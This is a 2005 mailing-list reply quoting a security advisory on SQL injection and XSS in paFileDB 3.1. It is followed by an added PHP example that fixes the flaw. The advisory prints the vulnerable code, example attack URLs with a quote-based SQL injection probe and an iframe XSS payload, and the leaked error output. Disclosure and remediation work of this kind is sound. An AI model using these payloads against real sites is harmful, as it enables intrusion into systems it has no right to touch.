
Not SQL injection and XSS in paFileDB?



In-Reply-To: <20050312182442.22116.qmail@xxxxxxxxxxxxxxxxxxxxx>

>Date: 12 Mar 2005 18:24:42 -0000
>Message-ID: <20050312182442.22116.qmail@xxxxxxxxxxxxxxxxxxxxx>
>From: SecurityReason <sp3x@xxxxxxxxxxxxxxxxxx>
>To: bugtraq@xxxxxxxxxxxxxxxxx
>Subject: [SECURITYREASON.COM]  SQL injection and XSS in paFileDB
>
>
>
>-=[ SecurityReason-2005-SRA#03 ]=-
>
>-=[ SQL injection and XSS in paFileDB ]=-
>
>Author: sp3x
>Date: 12 March 2005
>
>Affected software :
>===================
>paFileDB version : =>3.1
>
>Description :
>=============
>
>paFileDB is designed to allow webmasters to have a database of files for download
>on their site. To add a download, all you do is upload the file using FTP or
>whatever method you use, log into paFileDB's admin center, and fill out a form to
>add a file. paFileDB lets you edit and delete the files too.
>No more messing with a bunch of HTML pages for a file database on your site!
>Using speedy MySQL for storing data, and powerful PHP for processing everything,
>paFileDB is one of the best and easiest ways to manage files!
>
>SQL injection:
>=======================
>
>/includes/viewall.php
>/includes/category.php
>
>Code:
>-------------------------------------------------------------------------------------------------
>// $start comes straight from the request and is interpolated into LIMIT unchecked
>if ($sortby == "name") {
>        $result = $pafiledb_sql->query($db, "SELECT * FROM $db[prefix]_files WHERE file_pin = '0' ORDER BY file_name ASC LIMIT $start,20", 0);
>}
>if ($sortby == "date") {
>        $result = $pafiledb_sql->query($db, "SELECT * FROM $db[prefix]_files WHERE file_pin = '0' ORDER BY file_time DESC LIMIT $start,20", 0);
>}
>if ($sortby == "downloads") {
>        $result = $pafiledb_sql->query($db, "SELECT * FROM $db[prefix]_files WHERE file_pin = '0' ORDER BY file_dls DESC LIMIT $start,20", 0);
>}
>if ($sortby == "rating") {
>        $result = $pafiledb_sql->query($db, "SELECT * FROM $db[prefix]_files WHERE file_pin = '0' ORDER BY (file_rating/file_totalvotes - 1) DESC LIMIT $start,20", 0);
>}
>--------------------------------------------------------------------------------------------------
>
>As we can see, the $start variable is vulnerable to an SQL injection attack.
>But this SQL injection for now is not critical. Why? Because if we want to
>inject malicious code into the SQL sentence after "ORDER BY" or after "LIMIT",
>then in current MySQL versions all we can do is make the SQL request fail. No
>UNIONs etc. When we try to inject an SQL sentence we get: "Wrong usage of UNION
>and ORDER BY Error number: 1221", so we must wait. When MySQL version 4.1 is
>widely used, then we can have something like this - "ORDER BY desc ASC LIMIT
>(SELECT our_table FROM pafiledb_admin)...".
>
>Examples:
>=========
>
>SQL injection:
>--------------
>http://[target]/[pafiledb_dir]/pafiledb.php?action=viewall&start='&sortby=rating
>http://[target]/[pafiledb_dir]/pafiledb.php?action=category&start='&sortby=rating
>
>error message :
>---------------
>paFileDB was unable to successfully run a MySQL query.
>MySQL Returned this error: You have an error in your SQL syntax near '\',20' at line 1 Error number: 1064
>The query that caused this error was: SELECT * FROM pafiledb_files WHERE file_pin = '0' ORDER BY (file_rating/file_totalvotes - 1) DESC LIMIT \',20
>
>Also in this error message we can see the [prefix] of the pafiledb tables, which should
>be hidden :)
>And we can insert XSS code into the error message, for example:
>
>Cross Site Scripting (XSS):
>--------------------------
>
>http://[target]/[pafiledb_dir]/pafiledb.php?action=viewall&start=";><iframe%20src=http://www.securityreason.com></iframe>&sortby=rating
>http://[target]/[pafiledb_dir]/pafiledb.php?action=category&start=";><iframe%20src=http://www.securityreason.com></iframe>&sortby=date
>
>error message :
>---------------
>paFileDB was unable to successfully run a MySQL query.
>MySQL Returned this error: You have an error in your SQL syntax near '[Our XSS]',20' at line 1 Error number: 1064
>The query that caused this error was: SELECT * FROM pafiledb_files WHERE file_pin = '0' ORDER BY (file_rating/file_totalvotes - 1) DESC LIMIT [Our XSS]',20
>
>How to fix :
>============
>
>Download the new version of the script or update.
>
>Vendor :
>========
>
>No response
>
>
>Greetz :
>========
>
>Special greetz : cXIb8O3 , pkw :]
>
>Contact :
>=========
>
>sp3x[at]securityreason[dot].com
>www.securityreason.com
>
Dear sp3x,

Are you sure this is SQL injection or XSS?

I do not think it's SQL injection, because you use an XSS vuln in your bug.

I hope you read more info about SQL injection.
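For reference, a hardened rewrite of the viewall.php/category.php query construction quoted in the advisory above, as an added example that is not paFileDB's own code nor part of this thread. It assumes the `$pafiledb_sql->query($db, $sql, $flag)` call and `$db['prefix']` seen in the quoted snippet; the function names and the constructed `$db` array are illustrative. It addresses both findings at once: the unchecked `$start` in `LIMIT`, and the error page that echoed the raw query (the XSS sink) and the table prefix.

```php
<?php
// Added example, not paFileDB code. Hardened form of the quoted viewall.php
// logic: whitelist the sort key, coerce the LIMIT offset, escape error output.

// 1. $sortby selects an ORDER BY clause from a fixed map; the raw value is
//    never interpolated, and unknown keys fall back to a default.
const ORDER_BY = [
    'name'      => 'file_name ASC',
    'date'      => 'file_time DESC',
    'downloads' => 'file_dls DESC',
    'rating'    => '(file_rating/file_totalvotes - 1) DESC',
];

function buildListQuery(array $db, string $sortby, $start): string
{
    $order = ORDER_BY[$sortby] ?? ORDER_BY['name'];

    // 2. A LIMIT offset must be a non-negative integer. Casting makes the
    //    advisory's payloads ("'" or an <iframe> string) collapse to 0
    //    instead of reaching the SQL text.
    $start = max(0, (int) $start);

    // Table prefix is configuration, not user input, but restrict it anyway.
    $prefix = preg_replace('/[^A-Za-z0-9_]/', '', $db['prefix']);

    return "SELECT * FROM {$prefix}_files WHERE file_pin = '0' "
         . "ORDER BY {$order} LIMIT {$start},20";
}

// 3. The XSS in the advisory lives in the error page, which printed the
//    failing query verbatim. Escape everything before it reaches HTML, and
//    do not reveal the query (and thus the table prefix) to end users.
function renderQueryError(string $mysqlError, string $sql, bool $debug): string
{
    $html = '<p>paFileDB was unable to successfully run a MySQL query.</p>';
    if ($debug) {   // only for administrators; still escaped
        $html .= '<p>MySQL returned: '
              . htmlspecialchars($mysqlError, ENT_QUOTES, 'UTF-8') . '</p>'
              . '<p>Query: ' . htmlspecialchars($sql, ENT_QUOTES, 'UTF-8') . '</p>';
    }
    return $html;
}

// Usage with the advisory's two payloads as $start (constructed $db array).
$db = ['prefix' => 'pafiledb'];
echo buildListQuery($db, 'rating', "'"), "\n";
echo buildListQuery($db, 'date', '";><iframe src=http://example.invalid></iframe>'), "\n";
echo renderQueryError("syntax error near '\\',20'", "SELECT 1 LIMIT ',20", true), "\n";
```

Both payloads yield `LIMIT 0,20`, and the error renderer emits `&lt;iframe&gt;` rather than a live tag, so the advisory's injection path and its XSS sink are closed by the same two changes.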